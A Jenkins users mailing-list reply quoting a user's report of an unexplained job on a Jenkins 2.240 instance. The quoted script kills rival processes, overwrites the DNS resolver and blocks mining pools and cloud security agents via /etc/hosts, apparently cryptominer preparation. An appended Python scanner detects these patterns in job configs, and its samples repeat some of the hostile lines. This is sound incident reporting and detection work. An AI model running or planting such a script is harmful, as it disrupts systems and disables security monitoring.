Thanks for your report. I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.

> On 22. Jun 2020, at 19:15, Randall Becker <the.n.e....@gmail.com> wrote:
>
> Hi All,
>
> We just installed Jenkins 2.240 and suddenly there is a job with some really
> strange content, including:
>
> #!/bin/bash
>
> threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
> hostHash=$(hostname -f | md5sum | cut -c1-8);
> echo "${hostHash} - ${threadCount}";
> ktr () {
>   killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>   killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>   killall viunix;pkill viunix;killall -s SIGKILL viunix
>   kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>   kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>   kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>   echo kill
> }
>
> ktr
> ktr
> ktr
> echo plsfoodforcatsnlove
> echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
> echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
> echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
> echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
> echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
> echo "0.0.0.0 minexmr.com" >> /etc/hosts
>
> This is really creepy because this script cannot possibly run on our system
> (the good part). The bad part is that no one in our organization created this
> job. Is it possible that there is some malware floating around? Our Jenkins
> instance is hiding behind a firewall so there's no way in.
>
> Thanks,
> Randall
>
> --
> You received this message because you are subscribed to the Google Groups
> "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to jenkinsci-users+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
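
For triage of a report like the one quoted above, the following is an added example (not part of the original thread and not Jenkins project code) that scans job definitions for the behaviours visible in the quoted script. It assumes freestyle jobs whose shell build steps are stored as `hudson.tasks.Shell` elements in `JENKINS_HOME/jobs/<name>/config.xml`; the pattern labels, function names and sample configs are this example's own constructions.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Behaviours visible in the script quoted above; labels are this example's own.
SUSPICIOUS = {
    "forced process kill": re.compile(r"\b(?:p?kill\s+-9|killall\s+-s\s+SIGKILL)\b"),
    "host fingerprinting": re.compile(r"hostname\s+-f\s*\|\s*md5sum"),
    "hosts-file write": re.compile(r">>?\s*/etc/hosts\b"),
    "resolver overwrite": re.compile(r">>?\s*/etc/resolv\.conf\b"),
}

def scan_config(config_xml):
    """Return sorted labels of suspicious behaviours in a job's shell build steps."""
    # Jenkins can write an XML 1.1 declaration, which Python's expat-based
    # parser rejects, so drop the declaration before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    hits = set()
    for step in ET.fromstring(body).iter("hudson.tasks.Shell"):
        command = step.findtext("command") or ""
        hits.update(label for label, rx in SUSPICIOUS.items() if rx.search(command))
    return sorted(hits)

def scan_home(jenkins_home):
    """Scan JENKINS_HOME/jobs/*/config.xml; return {job name: labels} for flagged jobs."""
    report = {}
    for cfg in sorted(Path(jenkins_home).glob("jobs/*/config.xml")):
        labels = scan_config(cfg.read_text(encoding="utf-8", errors="replace"))
        if labels:
            report[cfg.parent.name] = labels
    return report

# Constructed sample configs (not taken from any real instance).
SAMPLE_BAD = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>#!/bin/bash
hostHash=$(hostname -f | md5sum | cut -c1-8);
pkill -9 -f trace
echo &quot;0.0.0.0 pool.minexmr.com&quot; &gt;&gt; /etc/hosts
echo &apos;nameserver 1.1.1.1&apos; &gt; /etc/resolv.conf
</command></hudson.tasks.Shell></builders></project>"""

SAMPLE_OK = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>make test
grep -c build /etc/hosts</command></hudson.tasks.Shell></builders></project>"""

if __name__ == "__main__":
    print(scan_config(SAMPLE_BAD), scan_config(SAMPLE_OK))
```

A hit only says that a job's shell step contains one of these patterns; who created the job and when still has to come from the job's file timestamps and the instance's own logs.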